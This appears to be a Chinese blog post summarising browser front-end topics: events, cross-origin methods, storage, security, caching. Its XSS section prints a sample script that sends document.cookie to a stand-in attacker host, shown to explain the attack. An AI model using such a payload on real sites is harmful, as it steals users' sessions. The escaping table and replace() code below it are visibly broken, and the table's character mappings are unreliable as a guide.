浏览器相关知识点总结

2019-02-22  本文已影响0人  池鱼_故渊

1.事件

事件触发有三个阶段

2.事件的代理

如果一个节点中有多个子节点,那么子节点的注册事件应该注册在父节点上,

<ul if="ul">
  <li>1</li>
 <li>2</li> 
 <li>3</li>
 <li>4</li>
</ul>
<script>
  let ul = document.getElementById("ul");
ul.addEventListener("click",e=>{
    console.log(e.target)
})
</script>

事件的代理相对于直接给目标注册事件:可以节省内存,不需要给子节点注销事件

3注册事件

一般我们用addeventListener注册事件,有时候我们只希望事件触发在目标身上,而不希望另外的事件也被触发,这个时候,我们就可以用stopPropagation来阻止事件的传播,通常stopPropagation是用来阻止事件冒泡,也可以阻止捕获事件
ps:stopImmediatePropagation也可以

4.跨域

1.jsonp
简单来说就是利用<script>标签没有跨域限制的漏洞,通过标签指向一个访问地址提供一个回调函数来接收数据,但是jsonp只能使用get请求

function jsonp(url,callback,success){
   let script =document.createElement('script');
   script.src=url;
   script.async = true;
   script.type='text/javascript';
   window[callback] = function(res){
     sucess && sucess(res)
   }
  document.body.appendChild(script)
}
jsonp('http://xxx', 'callback', function(value) {
  console.log(value)
})

以上代码是对jsonp函数的简单封装
2.CORS
cors需要浏览器和后端的同时支持,浏览器会自动进行cors通信,关键是后端,如果后端实现的cors,就实现了跨域,服务端设置Access-Control-Allow-Origin,就可以开启cors
3.postMessage
这种方式通常用于嵌入页面的第三方页面数据,一个页面发送消息,另一个页面判断来源并接受消息

// 发送消息端
window.parent.postMessage('message', 'http://xxx.com')
// 接收消息端
var mc = new MessageChannel()
mc.addEventListener('message', event => {
  var origin = event.origin || event.originalEvent.origin
  if (origin === 'http://xxx.com') {
    console.log('验证通过')
  }
})

4.document.domain
abc.www.baidu.comcdf.www.baidu.com 他们就都可以document.domain 指定到 www.baidu.com 即可跨域

5.渲染机制

页面的渲染一般分为:

1.load/DOMContentLoaded
Load事件触发代表页面中的dom,css,js图片已经全部加载完毕
DOMContentLoaded事件触发代表html被完全加载和解析,不需要等待css,js,图片
2.重绘和回流

6.cookie/localStorage/sessionStorage

数据存储大小:cookie 4k localStorage/sessionStorage 5M
参与服务通信: cookie 每次通信都会携带,其余不参与
生命周期:cookie一般由服务器生成,可以设置过期时间,localStorage 如果不清理一直存在,sessionStorage 页面关闭就清理

7.安全

1.CSRF
CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统;
如何防御

2.XSS
XSS 通过修改 HTML 节点或者执行 JS 代码来攻击网站。
举例
div.innerHTML = userComment // userComment 内容是 <script>$.get('http://hacker.com?cookie='+document.cookie)</script>
// 恶意就被执行了,这就是 XSS
预防
不要使用 innerHTML,改成 innerText,script 就会被当成文本,不执行
如果你一样要用 innerHTML,字符过滤
把 < 替换成 <
把 > 替换成 >
把 & 替换成 &
把 ' 替换成 '
把 ' 替换成 "
代码 div.innerHTML = userComment.replace(/>/g, '<').replace...
使用 CSP Content Security Policy
3.密码安全
通过给用户密码加密然后保存再数据库

8.缓存

9 内存泄漏

会引起内存泄漏的几种方式

上一篇下一篇

猜你喜欢

热点阅读